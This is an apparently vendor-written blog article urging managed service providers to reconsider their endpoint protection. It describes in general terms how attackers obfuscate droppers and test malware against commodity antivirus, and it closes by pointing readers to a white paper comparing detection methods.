With so many types of solutions designed to secure your customers’ endpoints from cyberattack, it may be time to take a step back and see if there’s a better way.
The reality for most every MSP offering some form of cybersecurity services – whether it be as simple as protecting endpoints as part of an RMM service, or as a full-blown layered cybersecurity offering – is that you want to employ solutions with the highest efficacy to minimize the amount of customer downtime and the utilization of tech resources.
You likely already have some form of endpoint security solution in place; it probably goes by any one of the buzzwordy terms such as antivirus, anti-malware, endpoint protection, endpoint detection, etc. What’s actually less important is the way the solution is described, and instead your focus should be on how the solution prevents cyberattacks.
Regardless of what you have in place today, there are three reasons why you should at the very least be spending a few cycles on learning more about what the latest ways to protect endpoints are – all in the name of keeping your customer secure and productive.
Assess vulnerabilities and threats, network security, workspace and equipment security, documentation, and more. The pack includes:
- a ready-to-print PDF file
- an Excel file to help create a customizable assessment resource
1. Cyberattacks Are Increasingly Becoming More Sophisticated
There are a number of ways malware is detected – whether it be based on a file hash, process behavior, or rules. But threat actors know this and are taking steps to make it more and more difficult for their wares to be detected. Take the example of a recent attack that aimed to install Cobalt Strike Beacon for use in a subsequent attack. In that attack, there were six different files used as droppers and/or payloads – each using some form of obfuscation to avoid detection. The scripting languages used are not only native to the endpoint (e.g., PowerShell on a Windows endpoint), but are so powerful in nature that the script itself can be used to help threat actors determine whether it’s “safe” to run while evading detection.
2. Threat Actors Are Testing Their Wares Against Commodity Solutions
Like any good development effort, your QA team is going to test the final product in a real environment to see if the desired outcomes occur. In the case of droppers, encoding/decoding efforts, and launched payloads, testing is much more detailed than simply determining if everything runs on the endpoint’s operating system; much of the testing involves launching a simulated attack against an endpoint running common endpoint security solutions. This way, threat actors can see if they can attack by stealth and, if not, make changes until the solution no longer detects them.
3. There Are Newer Technologies Out That Do a Better Job
One of the rationales behind why the previous two reasons are a reality today is that the security solutions currently in place – perhaps even in your customers’ environments – are utilizing detection technologies that are either unanimously seen as legacy or are still being touted as being cutting-edge when the bad guys already know better.
Even solutions flaunting their use of machine learning may not be able to keep up, despite being much better than their predecessors, as threats continue to evolve in response to detection capabilities.
Reconsidering Your Endpoint Protection
So, rather than settling for an endpoint security solution that promotes the latest and greatest detection buzzwords, or – quite frankly – even one highlighting a high detection rate, it may be time to stop and think about what you want as an MSP from your endpoint protection.
Doing so will obviously start with requirements such as stopping malware from running. Sure, that’s definitely important. But then you need to add in operational needs from a solution; things like not needing to continually update the detection engine, and minimizing false positives. To achieve these wants, it’s necessary to stop looking at solution types, and start looking at the underlying detection methods to determine which ones keep their ability to continue to detect attacks over time, despite the expectation that attacks will continue to evolve, while the detection method won’t.
To learn more about the various types of detection methods, how they work, and how well they stack up to an evolving attacker, check out the white paper Protecting the Endpoint: Deep Learning vs. EDR vs. Antivirus.